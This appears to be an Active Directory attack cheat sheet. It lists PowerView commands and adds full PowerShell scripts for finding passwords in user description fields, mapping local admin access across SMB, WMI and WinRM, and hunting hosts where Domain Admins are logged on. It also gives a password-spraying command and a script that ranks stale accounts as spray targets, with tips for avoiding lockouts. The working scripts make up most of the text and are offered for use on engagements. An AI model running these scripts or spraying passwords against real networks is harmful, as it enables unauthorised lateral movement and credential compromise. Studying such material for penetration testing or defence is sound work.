USER HUNTING
HUNTING JUICY NOTE
Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"
...
HUNTING ADMIN ACCESS
- Find all machines in the current domain where the current user has local admin access: Find-LocalAdminAccess, which wraps Get-NetComputer + Invoke-CheckLocalAdminAccess (an OpenSCManager call over RPC/SMB, so every host it touches logs a logon from you)
HUNTING PSREMOTE ACCESS
- Find machines where the current user has admin access over PowerShell Remoting (WinRM, TCP 5985/5986). This is a separate path that still works when SMB is filtered; note that membership in Remote Management Users is enough to get a session without being a local admin
HUNTING WMI ACCESS
- If SMB (TCP 445) is filtered, check with WMI: a Win32_* query over DCOM (TCP 135 plus a dynamic high port) only succeeds for local admins. WMI still rides on RPC, so a full RPC block stops it as well; in that case fall back to WinRM
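Added example for the three admin-access checks above (not code from the original notes or from PowerView). It assumes a domain-joined host running PowerShell 5.1 and tests the current user's token. Computers are pulled straight from LDAP, and mapping the C$ share stands in for Invoke-CheckLocalAdminAccess (which opens the Service Control Manager instead); each channel is probed separately so a host that filters one port can still show up on another.

```powershell
# Added example, not from the original notes. Assumes a domain-joined host,
# PowerShell 5.1 (Get-WmiObject is absent in PowerShell 7) and the current token.

function Get-DomainComputerName {
    # Enumerate every computer object in the current domain over LDAP (no PowerView needed).
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter   = '(objectCategory=computer)'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.Add('dnshostname')
    foreach ($r in $searcher.FindAll()) {
        if ($r.Properties['dnshostname'].Count -gt 0) { $r.Properties['dnshostname'][0] }
    }
}

function Test-AdminAccess {
    param([Parameter(Mandatory)][string]$ComputerName)
    $smb = $wmi = $psr = $false

    # SMB (TCP 445): the administrative share is only accessible to local admins.
    try { $smb = Test-Path -Path "\\$ComputerName\C$" -ErrorAction Stop } catch { }

    # WMI (DCOM: TCP 135 + dynamic high port): any Win32_* query needs local admin rights.
    try {
        $null = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName -ErrorAction Stop
        $wmi = $true
    } catch { }

    # PowerShell Remoting (WinRM: TCP 5985/5986): Administrators or Remote Management Users.
    try {
        $null = Invoke-Command -ComputerName $ComputerName -ScriptBlock { 1 } -ErrorAction Stop
        $psr = $true
    } catch { }

    [pscustomobject]@{ ComputerName = $ComputerName; SMB = $smb; WMI = $wmi; PSRemoting = $psr }
}

# Every probe is logged on the target (4624/4672 on success, 4625 on failure),
# so keep the scope small on an engagement.
Get-DomainComputerName |
    ForEach-Object { Test-AdminAccess -ComputerName $_ } |
    Where-Object { $_.SMB -or $_.WMI -or $_.PSRemoting } |
    Format-Table -AutoSize
```

A host that answers on WMI but not SMB is the case the WMI section describes; one that answers only on PSRemoting usually means the account is in Remote Management Users rather than Administrators, so check group membership before assuming full admin.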
HUNTING ADMIN
- Find local admins on all machines of the domain: Invoke-EnumerateLocalAdmin, i.e. Get-NetComputer + Get-NetLocalGroup. Get-NetLocalGroup enumerates the local SAM over RPC; on hosts hardened with "Restrict clients allowed to make remote calls to SAM" (the default from Windows 10 1607 / Server 2016) this needs local admin rights, so expect access denied on most machines
HUNTING SESSION
- Find computers where a domain admin (or a specified user/group) has sessions: Invoke-UserHunter (targets Domain Admins by default; use -UserName / -GroupName to change that)
- Confirm admin access on the hosts found with Invoke-UserHunter -CheckAccess
HUNTING DOMAIN ADMIN
- Find computers where a domain admin is logged in (Get-NetSession / Get-NetLoggedon)
- If none are found, wait for an incoming session: re-run the hunt periodically, or watch a host you already control (Get-NetLoggedon against it) until a privileged user logs on
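Added example for the session and domain-admin hunting steps above (not code from the original notes; it spells out what Invoke-UserHunter -CheckAccess does so the per-host queries are visible). It assumes the older PowerView build whose Get-Net* cmdlets these notes use is already imported, and that its Get-NetSession / Get-NetLoggedon objects expose the sesi10_* / wkui1_* field names of the underlying NetSessionEnum / NetWkstaUserEnum structures.

```powershell
# Added example, not from the original notes. Assumes PowerView (Get-Net* era) is loaded:
# Get-NetGroupMember, Get-NetComputer, Get-NetSession, Get-NetLoggedon, Invoke-CheckLocalAdminAccess.
param([string]$GroupName = 'Domain Admins')

# 1. Who are we hunting? -Recurse includes members of nested groups.
$targets = Get-NetGroupMember -GroupName $GroupName -Recurse |
    Select-Object -ExpandProperty MemberName |
    ForEach-Object { $_.ToLower() } | Sort-Object -Unique

# 2. Ask every computer who has a session (NetSessionEnum) or is logged on (NetWkstaUserEnum).
#    NetWkstaUserEnum needs local admin on the target; NetSessionEnum was open to any domain
#    user on older Windows but recent builds restrict it to admins by default, so many hosts
#    will simply return nothing.
$hits = foreach ($computer in (Get-NetComputer)) {
    $seen = @()
    try {
        $seen += Get-NetSession -ComputerName $computer | ForEach-Object {
            [pscustomobject]@{ User = $_.sesi10_username; Source = $_.sesi10_cname; Via = 'session' }
        }
    } catch { }
    try {
        $seen += Get-NetLoggedon -ComputerName $computer | ForEach-Object {
            [pscustomobject]@{ User = $_.wkui1_username; Source = $computer; Via = 'loggedon' }
        }
    } catch { }

    foreach ($s in $seen) {
        # Strip a DOMAIN\ prefix and skip machine accounts (trailing $) before matching.
        $name = ($s.User -replace '^.*\\', '').TrimEnd('$').ToLower()
        if ($name -and ($targets -contains $name)) {
            [pscustomobject]@{
                TargetUser   = $name
                ComputerName = $computer
                Via          = $s.Via
                Source       = $s.Source
                # 3. Confirm we could actually use this host (the -CheckAccess step).
                LocalAdmin   = Invoke-CheckLocalAdminAccess -ComputerName $computer
            }
        }
    }
}

$hits | Format-Table -AutoSize
```

The Source column matters: a session entry names the client machine the admin connected from, which is often a better target than the server that reported it. Re-running this loop on a timer is the "wait for an incoming session" step.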
PASSWORD SPRAYING
# CHECK THE LOCKOUT POLICY FIRST SO THE SPRAY DOES NOT LOCK ACCOUNTS: one password per user per observation window, keeping attempts below LockoutBadCount
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
:warning: VERY NOISY
Setting key | Explanation
---|---
LockoutDuration | Minutes a locked-out account stays locked before it is unlocked automatically. -1 = an administrator must unlock it.
LockoutBadCount | Number of failed logon attempts within the observation window after which the account is locked out. 0 = accounts are never locked out.
ResetLockoutCount | Observation window: minutes after the last failed logon before the bad-password counter is reset to 0. Windows requires it to be less than or equal to LockoutDuration. Space spraying rounds by this value.
PWDLASTSET
- Read the pwdlastset attribute of every user in the current domain to see when each password was last set. It is a FILETIME value; 0 means the user must change the password at next logon. Old values mark accounts worth spraying and passwords likely to appear in older breach dumps
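Added example (not code from the original notes) that reads pwdlastset over LDAP without PowerView, converts the FILETIME value and flags stale, enabled accounts. It assumes a domain-joined host; the 365-day threshold is an arbitrary choice.

```powershell
# Added example, not from the original notes. Assumes a domain-joined host.

function Get-PasswordAge {
    param([int]$StaleDays = 365)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter   = '(&(objectCategory=person)(objectClass=user))'
    $searcher.PageSize = 500
    foreach ($p in 'samaccountname', 'pwdlastset', 'useraccountcontrol') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }
    foreach ($r in $searcher.FindAll()) {
        # pwdlastset is 100-ns ticks since 1601-01-01 (FILETIME); 0 = change at next logon.
        $raw = if ($r.Properties['pwdlastset'].Count -gt 0) { [int64]$r.Properties['pwdlastset'][0] } else { 0 }
        $uac = [int]$r.Properties['useraccountcontrol'][0]
        $set = if ($raw -gt 0) { [DateTime]::FromFileTime($raw) } else { $null }
        $age = if ($set) { [int]((Get-Date) - $set).TotalDays } else { $null }
        [pscustomobject]@{
            User         = $r.Properties['samaccountname'][0]
            PwdLastSet   = $set
            AgeDays      = $age
            Disabled     = [bool]($uac -band 0x2)       # ACCOUNTDISABLE
            NeverExpires = [bool]($uac -band 0x10000)   # DONT_EXPIRE_PASSWORD
            Stale        = ($null -ne $age -and $age -gt $StaleDays)
        }
    }
}

# Enabled accounts with the oldest passwords first: the best spray candidates,
# and the ones most likely to sit in breach dumps from the same era.
Get-PasswordAge | Where-Object { -not $_.Disabled -and $_.Stale } |
    Sort-Object AgeDays -Descending | Format-Table -AutoSize
```

Accounts with NeverExpires set and a very old PwdLastSet are often service accounts; combine this list with the description-field search at the top of the page before spraying.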